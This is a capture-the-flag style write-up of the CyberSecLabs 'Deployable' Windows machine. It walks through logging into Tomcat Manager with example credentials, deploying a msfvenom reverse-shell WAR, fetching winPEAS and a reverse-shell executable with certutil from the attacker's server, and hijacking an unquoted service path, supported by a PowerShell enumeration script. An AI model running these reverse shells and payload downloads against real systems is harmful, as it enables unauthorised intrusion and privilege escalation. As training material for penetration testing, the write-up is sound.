CyberSecLabs-Deployable
This is my 7th write-up and I will be discussing my experience with the machine “Deployable” from CyberSecLabs. CyberSecLabs is a great platform for people who are new to penetration testing and want to boost their skills to take on the OSCP. This was a beginner-level Windows machine and I found it quite challenging. This box taught me a lot about exploiting Windows services. Default Tomcat credentials are revealed by the manager application's 401 error page, which leads to deploying a reverse shell WAR file. Then an unquoted service path lands me an administrator shell.
Step 1: Enumeration
I started off with two Nmap scans on this machine. My first scan used the default scripts (-sC) and version detection (-sV). The second scan turned up some other open ports that led me down a rabbit hole, so I stuck with the results from the first scan.
After enumerating the obvious ports from top to bottom, port 8080, running Apache Tomcat, became of interest. When visiting http://172.31.1.13:8080 I was presented with the default Tomcat landing page. I clicked on the Manager App link and it prompted for a username and password.
After a couple of failed attempts I hit cancel and was brought to a page with a 401 Unauthorized error. Tomcat's stock 401 page for the manager application helpfully includes a sample tomcat-users.xml entry showing how to grant the manager-gui role, complete with an example username and password, and sure enough when I tested those credentials on the manager login prompt they worked! Example users copied straight from the documentation into tomcat-users.xml are exactly what an attacker will try first.
Step 2: Exploitation
With access to the Tomcat Manager I saw that it lets you upload and deploy a WAR file. I created a reverse shell WAR with msfvenom and set up a nc listener to catch the connection once the application was deployed.
On Kali Machine:
sudo msfvenom -p java/jsp_shell_reverse_tcp LHOST=yourip LPORT=6666 -f war > sin.war
sudo nc -lvp 6666
Once I had deployed the WAR file through the Manager, I browsed to the application path, which takes its name from the file; the JSP payload inside the WAR runs as soon as the context is requested:
http://172.31.1.13:8080/sin
Step 3: Post Exploitation
Back on my Kali machine the listener caught the reverse connection, giving me a shell as the tomcat user.
After trying different priv-esc enumeration scripts I found winPEAS super helpful.
I pushed it to the box with the following commands, serving from the directory where my winPEAS batch file resided:
On my Kali Machine:
sudo python3 -m http.server 80
On the Windows box:
certutil.exe -urlcache -split -f "http://yourip:80/winPEAS.bat"
I then ran the file on the windows machine:
winPEAS.bat
Unquoted service paths caught my eye when analyzing the script results. When a service's binary path contains spaces and isn't enclosed in quotes, Windows cannot tell where the executable name ends and its arguments begin, so when the service starts the Service Control Manager tries each space-delimited prefix of the path in turn, appending .exe, until one exists. If a low-privileged user can write to one of the directories checked before the real binary, they can drop an executable there and it will run under the service's account, which is very often LocalSystem. Two conditions have to hold: the directory must be writable, and you must be able to start the service (or it must be set to start automatically, so a reboot triggers it).
I walked down the path one directory at a time. I could cd into C:\Program Files and then into \Deploy Ready, but not into \Service Files, so \Deploy Ready was the place to check. Note that being able or unable to cd into a directory only reflects traverse access, not write permission; the real test is to inspect the ACL with icacls or simply try to create a file there. In this case \Deploy Ready turned out to be writable.
Example:
cd "C:\Program Files"
cd Depl*
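The check described above can be done far more reliably than walking directories with cd. The PowerShell below is an added example and is not part of the original write-up or of winPEAS: it enumerates every service whose binary path is unquoted and contains spaces, lists the exact locations the Service Control Manager will try before reaching the real executable, and tests each of those directories by actually creating and deleting a file in it. The service path used in the worked call at the bottom, C:\Program Files\Deploy Ready\Service Files\Service.exe, is an assumption that mirrors the write-up, not a value the write-up states.

```powershell
# Added example, not part of the original write-up or of winPEAS: find services
# with unquoted, space-containing binary paths, list the hijack locations the
# Service Control Manager checks first, and test which of them are writable.
# The path in the worked call at the bottom is an assumption mirroring the box.

function Get-UnquotedServicePathCandidates {
    param([Parameter(Mandatory)][string]$ImagePath)

    # Keep only the executable portion; anything after ".exe" is arguments.
    $exe = $ImagePath
    $idx = $ImagePath.ToLower().IndexOf('.exe')
    if ($idx -ge 0) { $exe = $ImagePath.Substring(0, $idx + 4) }

    # CreateProcess resolves an unquoted path by trying each space-delimited
    # prefix in turn, appending .exe, before it reaches the full path.
    $parts = $exe -split ' '
    $candidates = @()
    for ($i = 0; $i -lt $parts.Length - 1; $i++) {
        $candidates += (($parts[0..$i] -join ' ') + '.exe')
    }
    return $candidates
}

function Test-WritableDirectory {
    param([Parameter(Mandatory)][string]$Path)

    # A successful cd only proves traverse access; creating a file is the real
    # test. A random name avoids clobbering anything that already exists.
    if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return $false }
    $probe = Join-Path $Path ([System.IO.Path]::GetRandomFileName())
    try {
        [System.IO.File]::WriteAllText($probe, '')
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch {
        return $false
    }
}

function Find-HijackableServicePaths {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $path = $svc.PathName
        # Quoted paths are parsed unambiguously; skip them.
        if (-not $path -or $path.StartsWith('"')) { continue }
        $candidates = @(Get-UnquotedServicePathCandidates -ImagePath $path)
        if ($candidates.Count -eq 0) { continue }   # no spaces in the exe path

        foreach ($c in $candidates) {
            $dir = Split-Path -Parent $c
            [pscustomobject]@{
                Service     = $svc.Name
                RunsAs      = $svc.StartName   # LocalSystem is what you want to see
                StartMode   = $svc.StartMode   # Auto: fires on reboot even without start rights
                ImagePath   = $path
                Hijack      = $c
                DirWritable = Test-WritableDirectory -Path $dir
            }
        }
    }
}

# Worked instance with the assumed path of the write-up's Deploy service.
Get-UnquotedServicePathCandidates -ImagePath 'C:\Program Files\Deploy Ready\Service Files\Service.exe'

# Live enumeration on the target; only rows with DirWritable = True matter.
Find-HijackableServicePaths | Where-Object DirWritable | Format-Table -AutoSize
```

For the assumed path the helper lists C:\Program.exe, C:\Program Files\Deploy.exe and C:\Program Files\Deploy Ready\Service.exe; the last of these is the location the rest of this write-up plants its payload in. A writable directory is only half the condition: the RunsAs column tells you what account the payload will run as, and StartMode tells you whether you need permission to start the service yourself or can wait for a reboot. The fix on the defensive side is simply to quote the service's ImagePath in the registry.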
I went back to my kali machine and created a reverse shell to upload into this writable directory.
On Kali Machine:
sudo msfvenom -p windows/x64/shell_reverse_tcp LHOST=yourip LPORT=1234 -f exe > sin.exe
I then followed the same method as above, serving the file with the Python web server and fetching it with certutil, but this time I gave certutil the output name Service.exe and ran it from inside the writable Deploy Ready directory. You may need to kill the previous Python server and start it again in the directory containing your msfvenom payload.
On my Kali Machine:
sudo python3 -m http.server 80
On the Windows box:
certutil.exe -urlcache -split -f "http://yourip:80/sin.exe" Service.exe
The last argument to certutil is the output file name, so the payload lands as Service.exe inside C:\Program Files\Deploy Ready, one of the locations the Service Control Manager tries before it reaches the real binary under Service Files. I then started another netcat listener on my machine, this time on the port I specified when building the executable with msfvenom.
On My Kali Machine:
sudo nc -lvp 1234
Now I needed to start the service on the Windows machine and catch the reverse connection.
On the Windows Machine:
sc start Deploy
Back on my machine the listener caught the connection spawned by the restarted service, giving me a shell with the service's privileges and full admin access.